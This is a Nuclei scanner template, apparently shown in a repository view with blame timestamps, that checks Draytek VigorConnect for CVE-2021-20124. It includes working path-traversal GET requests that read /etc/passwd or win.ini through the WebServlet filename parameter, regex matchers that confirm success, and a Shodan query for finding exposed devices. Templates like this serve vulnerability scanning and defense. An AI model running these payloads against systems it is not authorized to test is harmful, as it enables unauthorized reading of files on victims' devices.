nuclei-templates/http/cves/2021/CVE-2021-20124.yaml

48 lines
1.5 KiB
YAML
Raw Normal View History

2022-05-13 09:07:02 +00:00
id: CVE-2021-20124
info:
name: Draytek VigorConnect 6.0-B3 - Local File Inclusion
2022-05-13 09:07:02 +00:00
author: 0x_Akoko
severity: high
description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
2022-05-13 09:07:02 +00:00
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://www.draytek.com/products/vigorconnect/
- https://nvd.nist.gov/vuln/detail/CVE-2021-20124
2022-05-13 09:07:02 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-05-13 09:07:02 +00:00
cvss-score: 7.5
cve-id: CVE-2021-20124
cwe-id: CWE-668
cpe: cpe:2.3:a:draytek:vigorconnect:*:*:*:*:*:*:*:*
epss-score: 0.00388
metadata:
max-request: 2
2023-06-04 08:13:42 +00:00
verified: true
2022-06-28 03:10:49 +00:00
shodan-query: http.html:"VigorConnect"
tags: cve,cve2021,draytek,lfi,vigorconnect,tenable
2022-05-13 09:07:02 +00:00
http:
2022-05-13 09:07:02 +00:00
- method: GET
path:
- "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd"
- "{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"
stop-at-first-match: true
2022-05-13 09:07:02 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: word
part: header
words:
- "application/octet-stream"
2022-05-13 09:07:02 +00:00
- type: status
status:
- 200